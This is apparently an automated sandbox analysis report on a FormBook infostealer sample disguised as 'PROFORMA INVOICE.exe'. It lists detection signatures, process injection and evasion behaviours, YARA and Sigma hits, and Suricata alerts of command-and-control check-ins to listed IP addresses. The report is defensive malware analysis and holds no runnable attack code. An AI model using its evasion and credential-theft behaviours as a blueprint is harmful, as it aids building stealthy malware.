Edit tour

Windows Analysis Report
PROFORMA INVOICE.exe

Overview

General Information

Sample name:	PROFORMA INVOICE.exe
Analysis ID:	1556192
MD5:	f8e4e80faa805326b35ddc61ae9780f9
SHA1:	6f6a6da9230b47109cc5f4ca4fe69f3a9b063840
SHA256:	315cce3d409b020ca20c727e368fb9e5a7b99f390b0329e6657b64a1383d9c1b
Tags:	exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

PROFORMA INVOICE.exe (PID: 2200 cmdline: "C:\Users\user\Desktop\PROFORMA INVOICE.exe" MD5: F8E4E80FAA805326B35DDC61AE9780F9)

svchost.exe (PID: 4296 cmdline: "C:\Users\user\Desktop\PROFORMA INVOICE.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

qWxlULNrWdo.exe (PID: 2060 cmdline: "C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

srdelayed.exe (PID: 5284 cmdline: "C:\Windows\SysWOW64\srdelayed.exe" MD5: B5F31FDCE1BE4171124B9749F9D2C600)

ktmutil.exe (PID: 1196 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)

qWxlULNrWdo.exe (PID: 3084 cmdline: "C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1360 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.1966199008.0000000006E90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3555099409.0000000002A10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3556751373.0000000002F20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1958657577.00000000051E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1958001849.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3559031904.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3556631891.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3556728136.00000000043A0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PROFORMA INVOICE.exe", CommandLine: "C:\Users\user\Desktop\PROFORMA INVOICE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFORMA INVOICE.exe", ParentImage: C:\Users\user\Desktop\PROFORMA INVOICE.exe, ParentProcessId: 2200, ParentProcessName: PROFORMA INVOICE.exe, ProcessCommandLine: "C:\Users\user\Desktop\PROFORMA INVOICE.exe", ProcessId: 4296, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\PROFORMA INVOICE.exe", CommandLine: "C:\Users\user\Desktop\PROFORMA INVOICE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFORMA INVOICE.exe", ParentImage: C:\Users\user\Desktop\PROFORMA INVOICE.exe, ParentProcessId: 2200, ParentProcessName: PROFORMA INVOICE.exe, ProcessCommandLine: "C:\Users\user\Desktop\PROFORMA INVOICE.exe", ProcessId: 4296, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T04:21:34.416407+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49737	154.92.61.37	80	TCP
2024-11-15T04:21:58.968332+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49786	3.33.130.190	80	TCP
2024-11-15T04:22:12.806045+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49804	203.161.49.193	80	TCP
2024-11-15T04:22:26.196613+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49808	3.33.130.190	80	TCP
2024-11-15T04:22:39.516299+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49812	3.33.130.190	80	TCP
2024-11-15T04:22:52.955773+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49816	198.252.98.54	80	TCP
2024-11-15T04:23:06.737546+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49820	103.224.182.242	80	TCP
2024-11-15T04:23:21.108004+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49824	154.23.184.218	80	TCP
2024-11-15T04:23:35.151896+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49828	31.31.196.17	80	TCP
2024-11-15T04:23:49.105327+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49832	64.190.63.222	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T04:21:34.416407+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49737	154.92.61.37	80	TCP
2024-11-15T04:21:58.968332+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49786	3.33.130.190	80	TCP
2024-11-15T04:22:12.806045+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49804	203.161.49.193	80	TCP
2024-11-15T04:22:26.196613+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49808	3.33.130.190	80	TCP
2024-11-15T04:22:39.516299+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49812	3.33.130.190	80	TCP
2024-11-15T04:22:52.955773+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49816	198.252.98.54	80	TCP
2024-11-15T04:23:06.737546+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49820	103.224.182.242	80	TCP
2024-11-15T04:23:21.108004+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49824	154.23.184.218	80	TCP
2024-11-15T04:23:35.151896+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49828	31.31.196.17	80	TCP
2024-11-15T04:23:49.105327+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49832	64.190.63.222	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T04:21:51.135711+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49740	3.33.130.190	80	TCP
2024-11-15T04:21:52.844924+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49756	3.33.130.190	80	TCP
2024-11-15T04:21:55.337611+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49771	3.33.130.190	80	TCP
2024-11-15T04:22:05.151758+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49801	203.161.49.193	80	TCP
2024-11-15T04:22:07.685048+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49802	203.161.49.193	80	TCP
2024-11-15T04:22:10.251146+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49803	203.161.49.193	80	TCP
2024-11-15T04:22:19.370197+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49805	3.33.130.190	80	TCP
2024-11-15T04:22:21.083686+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49806	3.33.130.190	80	TCP
2024-11-15T04:22:23.605330+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49807	3.33.130.190	80	TCP
2024-11-15T04:22:31.871884+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49809	3.33.130.190	80	TCP
2024-11-15T04:22:34.430043+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49810	3.33.130.190	80	TCP
2024-11-15T04:22:37.854441+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49811	3.33.130.190	80	TCP
2024-11-15T04:22:45.277385+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49813	198.252.98.54	80	TCP
2024-11-15T04:22:47.821448+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49814	198.252.98.54	80	TCP
2024-11-15T04:22:50.375180+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49815	198.252.98.54	80	TCP
2024-11-15T04:22:59.125560+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49817	103.224.182.242	80	TCP
2024-11-15T04:23:01.685107+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49818	103.224.182.242	80	TCP
2024-11-15T04:23:04.251133+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49819	103.224.182.242	80	TCP
2024-11-15T04:23:13.667321+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49821	154.23.184.218	80	TCP
2024-11-15T04:23:16.010987+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49822	154.23.184.218	80	TCP
2024-11-15T04:23:18.764585+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49823	154.23.184.218	80	TCP
2024-11-15T04:23:27.511145+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49825	31.31.196.17	80	TCP
2024-11-15T04:23:30.089396+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49826	31.31.196.17	80	TCP
2024-11-15T04:23:32.620667+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49827	31.31.196.17	80	TCP
2024-11-15T04:23:41.464492+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49829	64.190.63.222	80	TCP
2024-11-15T04:23:44.058193+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49830	64.190.63.222	80	TCP
2024-11-15T04:23:46.589486+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49831	64.190.63.222	80	TCP
2024-11-15T04:23:55.295875+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49833	217.76.156.252	80	TCP
2024-11-15T04:23:58.398718+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49834	217.76.156.252	80	TCP
2024-11-15T04:24:01.491710+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49835	217.76.156.252	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: PROFORMA INVOICE.exe	ReversingLabs: Detection: 36%
Source: PROFORMA INVOICE.exe	Virustotal: Detection: 24%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1966199008.0000000006E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3555099409.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3556751373.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958657577.00000000051E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958001849.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3559031904.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3556631891.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3556728136.00000000043A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: PROFORMA INVOICE.exe

Joe Sandbox ML: detected

Source: PROFORMA INVOICE.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qWxlULNrWdo.exe, 00000003.00000000.1883023571.000000000021E000.00000002.00000001.01000000.00000005.sdmp, qWxlULNrWdo.exe, 00000008.00000002.3555102909.000000000021E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: PROFORMA INVOICE.exe, 00000000.00000003.1693059816.0000000004280000.00000004.00001000.00020000.00000000.sdmp, PROFORMA INVOICE.exe, 00000000.00000003.1693330671.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1958347966.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1865806917.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1958347966.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1864353262.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000002.3557184594.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000003.1968274121.0000000002F26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000002.3557184594.0000000003290000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000003.1970558661.00000000030DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PROFORMA INVOICE.exe, 00000000.00000003.1693059816.0000000004280000.00000004.00001000.00020000.00000000.sdmp, PROFORMA INVOICE.exe, 00000000.00000003.1693330671.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1958347966.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1865806917.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1958347966.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1864353262.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000005.00000002.3557184594.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000003.1968274121.0000000002F26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000002.3557184594.0000000003290000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000003.1970558661.00000000030DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000001.00000002.1958233127.0000000003419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1958211552.0000000003400000.00000004.00000020.00020000.00000000.sdmp, qWxlULNrWdo.exe, 00000003.00000002.3556028830.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ktmutil.pdb source: svchost.exe, 00000001.00000002.1958233127.0000000003419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1958211552.0000000003400000.00000004.00000020.00020000.00000000.sdmp, qWxlULNrWdo.exe, 00000003.00000002.3556028830.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: ktmutil.exe, 00000005.00000002.3557624704.00000000038BC000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000005.00000002.3555301986.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000000.2034763593.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2265030453.000000000616C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: ktmutil.exe, 00000005.00000002.3557624704.00000000038BC000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000005.00000002.3555301986.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000000.2034763593.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2265030453.000000000616C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FA6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00FA6CA9
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FA60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00FA60DD
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FA63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00FA63F9
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FAEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FAEB60
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FAF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00FAF5FA
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FAF56F FindFirstFileW,FindClose,	0_2_00FAF56F
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FB1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FB1B2F
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FB1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FB1C8A
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FB1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FB1F94
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A2C810 FindFirstFileW,FindNextFileW,FindClose,	5_2_02A2C810

Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4x nop then xor eax, eax	5_2_02A19F20
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4x nop then pop edi	5_2_02A1E50B
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_030204DF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49737 -> 154.92.61.37:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49737 -> 154.92.61.37:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49801 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49810 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49813 -> 198.252.98.54:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49808 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49786 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49786 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49822 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49808 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49806 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49815 -> 198.252.98.54:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49824 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49816 -> 198.252.98.54:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49829 -> 64.190.63.222:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49816 -> 198.252.98.54:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49824 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49835 -> 217.76.156.252:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49814 -> 198.252.98.54:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49805 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49830 -> 64.190.63.222:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49833 -> 217.76.156.252:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49811 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49802 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49825 -> 31.31.196.17:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49807 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49832 -> 64.190.63.222:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49832 -> 64.190.63.222:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49821 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49817 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49828 -> 31.31.196.17:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49828 -> 31.31.196.17:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49803 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49812 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49812 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49826 -> 31.31.196.17:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49820 -> 103.224.182.242:80
